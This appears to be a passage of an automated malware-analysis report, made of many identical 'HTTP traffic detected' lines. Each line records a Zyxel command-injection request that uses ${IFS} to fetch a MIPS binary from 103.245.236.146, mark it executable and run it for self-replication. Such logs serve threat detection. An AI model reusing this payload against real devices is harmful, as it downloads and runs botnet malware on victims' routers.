          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
